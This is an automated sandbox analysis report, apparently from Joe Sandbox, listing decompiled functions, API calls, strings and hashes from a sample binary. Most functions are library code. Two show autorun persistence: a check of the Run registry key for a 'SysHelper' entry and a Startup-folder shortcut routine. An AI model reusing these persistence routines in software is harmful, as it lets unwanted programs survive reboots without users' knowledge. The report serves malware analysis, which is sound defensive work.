0x00425c04
0x00425c06
0x00425c0e
0x00425c14
0x00425c1f
0x00425c26
0x00425c2a
0x00425c3e
0x00425c40
0x00425c43
0x00425c45
0x00425cfe
0x00425d04
0x00425c4b
0x00425c4b
0x00425c4f
0x00425c59
0x00425c60
0x00425c62
0x00425c64
0x00425c64
0x00425c62
0x00425c70
0x00425c76
0x00425c7d
0x00425c82
0x00425c88
0x00425c90
0x00425c94
0x00425c96
0x00425c9d
0x00425ca7
0x00425cae
0x00425cb4
0x00425cba
0x00425cbf
0x00425cc5
0x00425cca
0x00425ccd
0x00425ccd
0x00425c9d
0x00425cd2
0x00425cd6
0x00425cd6
0x00425c45
0x00425d0b
0x00425d12
0x00425d17
0x00425bc4
0x00425bc9
0x00425bcf
0x00425bd4
0x00425bd4
0x00425d1e
0x00425d1e
0x00000000

APIs

__invoke_watson.LIBCMT ref: 00425BA7
__calloc_crt.LIBCMT ref: 00425BF8
__lock.LIBCMT ref: 00425C0E
__copytlocinfo_nolock.LIBCMT ref: 00425C1F
__wsetlocale_nolock.LIBCMT ref: 00425C36
_wcscmp.LIBCMT ref: 00425C59
__lock.LIBCMT ref: 00425C70
__updatetlocinfoEx_nolock.LIBCMT ref: 00425C82
___removelocaleref.LIBCMT ref: 00425C88
__updatetlocinfoEx_nolock.LIBCMT ref: 00425CA7

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
String ID:
API String ID: 2762079118-0
Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110
stringcomCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00411B90(void* __ecx, WCHAR* __edx, void* _a4) {
				void* _v8;
				void* _v12;
				struct _ITEMIDLIST* _v16;
				char _v20;
				short _v532;
				char* _t30;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr* _t43;
				intOrPtr* _t48;
				intOrPtr* _t49;
				void* _t50;
				WCHAR* _t51;
				intOrPtr* _t54;
				intOrPtr* _t55;
				void* _t67;
				void* _t70;

				_t51 = __edx;
				_v8 = 0;
				_v12 = 0;
				__imp__CoInitialize(0, _t67, _t70, _t50);
				_t30 =  &_v8;
				__imp__CoCreateInstance(0x4ce908, 0, 1, 0x4cd568, _t30);
				__imp__CoUninitialize();
				if(_t30 >= 0) {
					_t34 = _v8;
					_t30 =  *((intOrPtr*)( *_t34))(_t34, 0x4cf2e8,  &_v12);
					if(_t30 >= 0) {
						_t35 = _v8;
						_t30 =  *((intOrPtr*)( *_t35 + 0x50))(_t35, __ecx);
						if(_t30 >= 0) {
							SHGetSpecialFolderLocation(_a4, 7,  &_v16);
							__imp__SHGetPathFromIDListW(_v16,  &_v532);
							lstrcatW( &_v532, "\\");
							lstrcatW( &_v532, _t51);
							_t43 = _v12;
							_t30 =  *((intOrPtr*)( *_t43 + 0x18))(_t43,  &_v532, 1);
							if(_t30 >= 0) {
								GetSystemDirectoryW( &_v532, 0x100);
								lstrcatW( &_v532, L"\\shell32.dll");
								_t48 = _v8;
								_t30 =  *((intOrPtr*)( *_t48 + 0x44))(_t48,  &_v532, 1);
								if(_t30 >= 0) {
									_t49 = _v8;
									_t30 =  *((intOrPtr*)( *_t49 + 0x40))(_t49,  &_v532, 0x100,  &_v20);
								}
							}
						}
					}
				}
				_t54 = _v12;
				if(_t54 != 0) {
					_t30 =  *((intOrPtr*)( *_t54 + 8))(_t54);
				}
				_t55 = _v8;
				if(_t55 == 0) {
					return _t30;
				} else {
					return  *((intOrPtr*)( *_t55 + 8))(_t55);
				}
			}

0x00411b9e
0x00411ba0
0x00411ba9
0x00411bb0
0x00411bb6
0x00411bc8
0x00411bd0
0x00411bd8
0x00411bde
0x00411bed
0x00411bf1
0x00411bf7
0x00411bfe
0x00411c03
0x00411c12
0x00411c22
0x00411c3a
0x00411c44
0x00411c46
0x00411c55
0x00411c5a
0x00411c68
0x00411c7a
0x00411c7c
0x00411c8b
0x00411c90
0x00411c92
0x00411ca8
0x00411ca8
0x00411c90
0x00411c5a
0x00411c03
0x00411bf1
0x00411cab
0x00411cb3
0x00411cb8
0x00411cb8
0x00411cbb
0x00411cc0
0x00411ccb
0x00411cc2
0x00000000
0x00411cc5

APIs

CoInitialize.OLE32(00000000), ref: 00411BB0
CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
CoUninitialize.OLE32 ref: 00411BD0
SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
lstrcatW.KERNEL32(?), ref: 00411C44
GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A

Strings

\shell32.dll, xrefs: 00411C6E

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
String ID: \shell32.dll
API String ID: 679253221-3783449302
Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E004549A0(void* __ebx) {
				signed int _v8;
				long _v12;
				void* _v16;
				void* _v24;
				void* __edi;
				void* __esi;
				signed int _t21;
				CHAR* _t23;
				void* _t31;
				unsigned int _t34;
				struct HINSTANCE__* _t42;
				void* _t43;
				void* _t52;
				void* _t54;
				void* _t55;
				long _t56;
				signed int _t58;
				void* _t59;

				_t43 = __ebx;
				E0042F7C0(0xc);
				_t21 =  *0x50ad20; // 0x4ea20c1c
				_v8 = _t21 ^ _t58;
				_t23 =  *0x512a94;
				if(_t23 != 0) {
					L12:
					if(_t23 == 0xffffffff) {
						goto L6;
					} else {
						 *_t23();
						return E0042A77E(_t43, _v8 ^ _t58, _t52, _t54, _t56);
					}
				} else {
					_t42 = GetModuleHandleA(_t23);
					if(_t42 == 0) {
						_t23 =  *0x512a94;
					} else {
						_t23 = GetProcAddress(_t42, "_OPENSSL_isservice");
						 *0x512a94 = _t23;
					}
					if(_t23 != 0) {
						goto L12;
					} else {
						 *0x512a94 = 0xffffffff;
						L6:
						GetDesktopWindow();
						_t55 = GetProcessWindowStation();
						if(_t55 == 0 || GetUserObjectInformationW(_t55, 2, 0, 0,  &_v12) != 0 || GetLastError() != 0x7a) {
							L14:
							return E0042A77E(_t43, _v8 ^ _t58, _t52, _t55, _t56);
						} else {
							_t56 = _v12;
							if(_t56 > 0x200) {
								goto L14;
							} else {
								_t56 = _t56 + 0x00000001 & 0xfffffffe;
								E0043F980(_t56 + 2, _t56);
								_t31 = _t59;
								_v16 = _t31;
								if(GetUserObjectInformationW(_t55, 2, _t31, _t56,  &_v12) == 0) {
									goto L14;
								} else {
									_t47 = _v16;
									_t34 = _v12 + 0x00000001 & 0xfffffffe;
									_v12 = _t34;
									_push(L"Service-0x");
									 *((short*)(_v16 + (_t34 >> 1) * 2)) = 0;
									E00421C02(_v16);
									asm("sbb eax, eax");
									return E0042A77E(_t43, _v8 ^ _t58, 0, _t55, _t56, _t47);
								}
							}
						}
					}
				}
			}

0x004549a0
0x004549a8
0x004549ad
0x004549b4
0x004549b7
0x004549c0
0x00454aab
0x00454aae
0x00000000
0x00454ab4
0x00454ab4
0x00454ac8
0x00454ac8
0x004549c6
0x004549c7
0x004549cf
0x004549e4
0x004549d1
0x004549d7
0x004549dd
0x004549dd
0x004549eb
0x00000000
0x004549f1
0x004549f1
0x004549fb
0x004549fb
0x00454a07
0x00454a0b
0x00454ac9
0x00454ade
0x00454a39
0x00454a39
0x00454a42
0x00000000
0x00454a48
0x00454a49
0x00454a52
0x00454a57
0x00454a62
0x00454a6d
0x00000000
0x00454a6f
0x00454a74
0x00454a78
0x00454a7b
0x00454a80
0x00454a86
0x00454a8a
0x00454a94
0x00454aaa
0x00454aaa
0x00454a6d
0x00454a42
0x00454a0b
0x004549eb

APIs

GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
GetDesktopWindow.USER32 ref: 004549FB
GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
_wcsstr.LIBCMT ref: 00454A8A

Strings

_OPENSSL_isservice, xrefs: 004549D1
Service-0x, xrefs: 00454A80

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 2112994598-1672312481
Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58

Uniqueness

Uniqueness Score: -1.00%

Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75
registrywindowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E00454AE0(void* __ebx, void* __edx, void* __edi, void* __esi, char _a4, char _a259, signed int _a260, wchar_t* _a268, void _a272) {
				CHAR* _v0;
				signed int _t17;
				void* _t19;
				void* _t46;
				void* _t49;
				void* _t50;
				signed int _t51;
				signed int _t52;

				_t48 = __esi;
				_t47 = __edi;
				_t46 = __edx;
				_t39 = __ebx;
				E0042F7C0(0x108);
				_t17 =  *0x50ad20; // 0x4ea20c1c
				_a260 = _t17 ^ _t51;
				_t19 = GetStdHandle(0xfffffff4);
				if(_t19 == 0 || GetFileType(_t19) == 0) {
					vswprintf( &_a4, 0xff, _a268,  &_a272);
					_t52 = _t51 + 0x10;
					_a259 = 0;
					if(E004549A0(_t39) <= 0) {
						MessageBoxA(0,  &_a4, "OpenSSL: FATAL", 0x10);
						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t48);
					} else {
						_t49 = RegisterEventSourceA(0, "OPENSSL");
						_v0 =  &_a4;
						ReportEventA(_t49, 1, 0, 0, 0, 1, 0,  &_v0, 0);
						DeregisterEventSource(_t49);
						_t50 = _t48;
						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t50);
					}
				} else {
					E0042BDCC(E00420E4D() + 0x40, _a268,  &_a272);
					return E0042A77E(__ebx, _a260 ^ _t51 + 0x0000000c, _t46, __edi, __esi);
				}
			}

0x00454ae0
0x00454ae0
0x00454ae0
0x00454ae0
0x00454ae5
0x00454aea
0x00454af1
0x00454afa
0x00454b02
0x00454b5d
0x00454b62
0x00454b65
0x00454b74
0x00454bd3
0x00454bed
0x00454b76
0x00454b86
0x00454b8c
0x00454ba2
0x00454ba9
0x00454baf
0x00454bc4
0x00454bc4
0x00454b0f
0x00454b27
0x00454b43
0x00454b43

APIs

GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
__vfwprintf_p.LIBCMT ref: 00454B27

Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF

vswprintf.LIBCMT ref: 00454B5D
RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
MessageBoxA.USER32 ref: 00454BD3

Strings

OpenSSL: FATAL, xrefs: 00454BC7
OPENSSL, xrefs: 00454B77

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
String ID: OPENSSL$OpenSSL: FATAL
API String ID: 277090408-1348657634
Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B

Uniqueness

Uniqueness Score: -1.00%

Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00412360() {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v2066;
				short _v2068;
				short _v4116;
				signed int _t35;

				E0042F7C0(0x1010);
				_v8 = 0;
				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v8) == 0) {
					_v12 = 1;
					_v2068 = 0;
					E0042B420( &_v2066, 0, 0x7fe);
					_v20 = 0x400;
					RegQueryValueExW(_v8, L"SysHelper", 0,  &_v12,  &_v2068,  &_v20);
					RegCloseKey(_v8);
					_v16 = 0;
					lstrcpyW( &_v4116,  *(CommandLineToArgvW(GetCommandLineW(),  &_v16)));
					_t35 = lstrcmpW( &_v4116,  &_v2068);
					asm("sbb eax, eax");
					return  ~_t35 + 1;
				} else {
					return 0;
				}
			}

0x00412368
0x00412370
0x00412391
0x0041239b
0x004123a8
0x004123b6
0x004123be
0x004123de
0x004123e7
0x004123ed
0x0041240e
0x00412422
0x0041242a
0x00412430
0x00412393
0x00412398
0x00412398

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
_memset.LIBCMT ref: 004123B6
RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
RegCloseKey.ADVAPI32(?), ref: 004123E7
GetCommandLineW.KERNEL32 ref: 004123F4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
lstrcpyW.KERNEL32 ref: 0041240E
lstrcmpW.KERNEL32(?,?), ref: 00412422

Strings

SysHelper, xrefs: 004123D6
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
API String ID: 122392481-4165002228
Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94

Uniqueness

Uniqueness Score: -1.00%

Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00418000(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _t99;
				signed int _t102;
				signed int _t107;
				intOrPtr* _t108;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr* _t116;
				intOrPtr _t124;
				intOrPtr* _t136;
				intOrPtr _t148;
				intOrPtr _t149;
				intOrPtr _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t183;
				intOrPtr _t185;
				intOrPtr* _t188;
				intOrPtr _t189;
				intOrPtr* _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				intOrPtr _t197;
				intOrPtr* _t198;
				intOrPtr* _t199;
				intOrPtr* _t200;
				intOrPtr* _t201;
				intOrPtr* _t204;
				intOrPtr _t207;
				intOrPtr* _t208;
				intOrPtr* _t210;
				intOrPtr* _t213;
				intOrPtr* _t219;
				void* _t226;

				_push(__ecx);
				_t219 = __ecx;
				_t213 = _a4;
				_t188 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t188 < _t213) {
					L102:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return  *_t188;
				} else {
					_t183 = _a16;
					_t99 =  *((intOrPtr*)(_a12 + 0x10));
					if(_t99 < _t183) {
						goto L102;
					} else {
						_t188 = _t188 - _t213;
						_t207 =  <  ? _t188 : _a8;
						_a8 = _t207;
						_t185 =  <  ? _t99 - _t183 : _a20;
						_t102 =  *((intOrPtr*)(__ecx + 0x10)) - _t207;
						_v8 = _t102;
						if((_t102 | 0xffffffff) - _t185 <= _v8) {
							_push("string too long");
							E0044F23E(__eflags);
							goto L102;
						} else {
							_t189 = _t188 - _t207;
							_t107 = _v8 + _t185;
							_a20 = _t189;
							_v8 = _t107;
							if( *((intOrPtr*)(__ecx + 0x10)) < _t107) {
								_push(0);
								E00415810(_t185, __ecx, _t213, _t107);
								_t189 = _a20;
								_t207 = _a8;
							}
							_t108 = _a12;
							if(_t219 == _t108) {
								__eflags = _t185 - _t207;
								if(_t185 > _t207) {
									__eflags = _a16 - _t213;
									if(_a16 > _t213) {
										__eflags = _t213 + _t207 - _a16;
										_t110 =  *((intOrPtr*)(_t219 + 0x14));
										if(_t213 + _t207 > _a16) {
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_t190 = _t219;
											} else {
												_t190 =  *_t219;
											}
											__eflags = _t207;
											if(_t207 != 0) {
												__eflags = _a12 + _a16;
												E004205A0(_t190 + _t213, _a12 + _a16, _t207);
												_t207 = _a8;
												_t226 = _t226 + 0xc;
											}
											_t111 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t111 - 0x10;
											if(_t111 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t111 - 0x10;
											if(_t111 < 0x10) {
												_t191 = _t219;
											} else {
												_t191 =  *_t219;
											}
											_t112 = _a20;
											__eflags = _t112;
											if(_t112 != 0) {
												__eflags = _t191 + _t213 + _t185;
												E004205A0(_t191 + _t213 + _t185, _a12 + _t213 + _t207, _t112);
												_t226 = _t226 + 0xc;
											}
											_t113 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t113 - 0x10;
											if(_t113 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t113 - 0x10;
											if(_t113 < 0x10) {
												_t208 = _t219;
											} else {
												_t208 =  *_t219;
											}
											_t192 = _a8;
											_t115 = _t185 - _t192;
											__eflags = _t115;
											if(_t115 != 0) {
												_push(_t115);
												_push(_a12 + _a16 + _t185);
												_t124 = _t213 + _t208 + _t192;
												__eflags = _t124;
												goto L96;
											}
										} else {
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a4 = _t219;
											} else {
												_a4 =  *_t219;
												_t207 = _a8;
											}
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t189;
											if(_t189 != 0) {
												__eflags = _a12 + _t213 + _t185;
												E004205A0(_a12 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
												_t207 = _a8;
												_t226 = _t226 + 0xc;
											}
											_t197 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t197 - 0x10;
											if(_t197 < 0x10) {
												_t136 = _t219;
											} else {
												_t136 =  *_t219;
											}
											__eflags = _t197 - 0x10;
											if(_t197 < 0x10) {
												_t198 = _t219;
											} else {
												_t198 =  *_t219;
											}
											__eflags = _t185;
											if(_t185 != 0) {
												_push(_t185);
												_push(_t136 - _t207 + _a16 + _t185);
												_t124 = _t198 + _t213;
												goto L96;
											}
										}
									} else {
										_t148 =  *((intOrPtr*)(_t219 + 0x14));
										__eflags = _t148 - 0x10;
										if(_t148 < 0x10) {
											_a4 = _t219;
										} else {
											_a4 =  *_t219;
											_t207 = _a8;
										}
										__eflags = _t148 - 0x10;
										if(_t148 < 0x10) {
											_a8 = _t219;
										} else {
											_a8 =  *_t219;
										}
										__eflags = _t189;
										if(_t189 != 0) {
											__eflags = _a8 + _t213 + _t185;
											E004205A0(_a8 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
											_t226 = _t226 + 0xc;
										}
										_t149 =  *((intOrPtr*)(_t219 + 0x14));
										__eflags = _t149 - 0x10;
										if(_t149 < 0x10) {
											_t210 = _t219;
										} else {
											_t210 =  *_t219;
										}
										__eflags = _t149 - 0x10;
										if(_t149 < 0x10) {
											_t199 = _t219;
										} else {
											_t199 =  *_t219;
										}
										__eflags = _t185;
										if(_t185 != 0) {
											_push(_t185);
											_push(_a16 + _t210);
											_t124 = _t199 + _t213;
											goto L96;
										}
									}
								} else {
									_t160 =  *((intOrPtr*)(_t219 + 0x14));
									__eflags = _t160 - 0x10;
									if(_t160 < 0x10) {
										_a4 = _t219;
									} else {
										_a4 =  *_t219;
									}
									__eflags = _t160 - 0x10;
									if(_t160 < 0x10) {
										_t200 = _t219;
									} else {
										_t200 =  *_t219;
									}
									__eflags = _t185;
									if(_t185 != 0) {
										__eflags = _a4 + _a16;
										E004205A0(_t200 + _t213, _a4 + _a16, _t185);
										_t207 = _a8;
										_t226 = _t226 + 0xc;
									}
									_t161 =  *((intOrPtr*)(_t219 + 0x14));
									__eflags = _t161 - 0x10;
									if(_t161 < 0x10) {
										_a8 = _t219;
									} else {
										_a8 =  *_t219;
									}
									__eflags = _t161 - 0x10;
									if(_t161 < 0x10) {
										_t201 = _t219;
									} else {
										_t201 =  *_t219;
									}
									_t162 = _a20;
									__eflags = _t162;
									if(_t162 != 0) {
										_push(_t162);
										_push(_a8 + _t213 + _t207);
										_t124 = _t201 + _t213 + _t185;
										L96:
										_push(_t124);
										E004205A0();
										goto L97;
									}
								}
							} else {
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_a8 = _t219;
								} else {
									_a8 =  *_t219;
									_t213 = _a4;
								}
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_a20 = _t219;
								} else {
									_a20 =  *_t219;
									_t213 = _a4;
								}
								if(_t189 != 0) {
									E004205A0(_a20 + _t213 + _t185, _a8 + _t213 + _t207, _t189);
									_t108 = _a12;
									_t226 = _t226 + 0xc;
								}
								if( *((intOrPtr*)(_t108 + 0x14)) >= 0x10) {
									_t108 =  *_t108;
								}
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_t204 = _t219;
								} else {
									_t204 =  *_t219;
								}
								if(_t185 != 0) {
									E0042D8D0(_t204 + _t213, _t108 + _a16, _t185);
									L97:
								}
							}
							_t193 = _v8;
							 *(_t219 + 0x10) = _t193;
							if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
								_t116 = _t219;
								 *((char*)(_t116 + _t193)) = 0;
								return _t116;
							} else {
								 *((char*)( *_t219 + _t193)) = 0;
								return _t219;
							}
						}
					}
				}
			}

0x00418003
0x00418005
0x00418008
0x0041800b
0x00418010
0x00418342
0x00418342
0x00418347
0x0041834c
0x0041834d
0x0041834e
0x0041834f
0x00418352
0x00418016
0x0041801a
0x0041801d
0x00418022
0x00000000
0x00418028
0x0041802b
0x0041802f
0x00418039
0x0041803c
0x00418042
0x00418044
0x0041804f
0x00418338
0x0041833d
0x00000000
0x00418055
0x00418058
0x0041805a
0x0041805c
0x0041805f
0x00418065
0x00418067
0x0041806c
0x00418071
0x00418074
0x00418074
0x00418077
0x0041807c
0x004180f3
0x004180f5
0x0041816a
0x0041816d
0x004181e3
0x004181e6
0x004181e9
0x0041825e
0x00418261
0x0041826a
0x00418263
0x00418265
0x00418265
0x0041826d
0x00418270
0x00418276
0x00418272
0x00418272
0x00418272
0x00418278
0x0041827a
0x0041827f
0x00418288
0x0041828d
0x00418290
0x00418290
0x00418293
0x00418296
0x00418299
0x004182a2
0x0041829b
0x0041829d
0x0041829d
0x004182a5
0x004182a8
0x004182ae
0x004182aa
0x004182aa
0x004182aa
0x004182b0
0x004182b3
0x004182b5
0x004182c3
0x004182c6
0x004182cb
0x004182cb
0x004182ce
0x004182d1
0x004182d4
0x004182dd
0x004182d6
0x004182d8
0x004182d8
0x004182e0
0x004182e3
0x004182e9
0x004182e5
0x004182e5
0x004182e5
0x004182eb
0x004182f0
0x004182f0
0x004182f2
0x004182f4
0x004182fd
0x00418302
0x00418302
0x00000000
0x00418302
0x004181eb
0x004181eb
0x004181ee
0x004181fa
0x004181f0
0x004181f2
0x004181f5
0x004181f5
0x004181fd
0x00418200
0x00418209
0x00418202
0x00418204
0x00418204
0x0041820c
0x0041820e
0x0041821e
0x00418221
0x00418226
0x00418229
0x00418229
0x0041822c
0x0041822f
0x00418232
0x00418238
0x00418234
0x00418234
0x00418234
0x0041823a
0x0041823d
0x00418243
0x0041823f
0x0041823f
0x0041823f
0x00418245
0x00418247
0x00418254
0x00418255
0x00418256
0x00000000
0x00418256
0x00418247
0x0041816f
0x0041816f
0x00418172
0x00418175
0x00418181
0x00418177
0x00418179
0x0041817c
0x0041817c
0x00418184
0x00418187
0x00418190
0x00418189
0x0041818b
0x0041818b
0x00418193
0x00418195
0x004181a5
0x004181a8
0x004181ad
0x004181ad
0x004181b0
0x004181b3
0x004181b6
0x004181bc
0x004181b8
0x004181b8
0x004181b8
0x004181be
0x004181c1
0x004181c7
0x004181c3
0x004181c3
0x004181c3
0x004181c9
0x004181cb
0x004181d6
0x004181d7
0x004181d8
0x00000000
0x004181d8
0x004181cb
0x004180f7
0x004180f7
0x004180fa
0x004180fd
0x00418106
0x004180ff
0x00418101
0x00418101
0x00418109
0x0041810c
0x00418112
0x0041810e
0x0041810e
0x0041810e
0x00418114
0x00418116
0x0041811b
0x00418124
0x00418129
0x0041812c
0x0041812c
0x0041812f
0x00418132
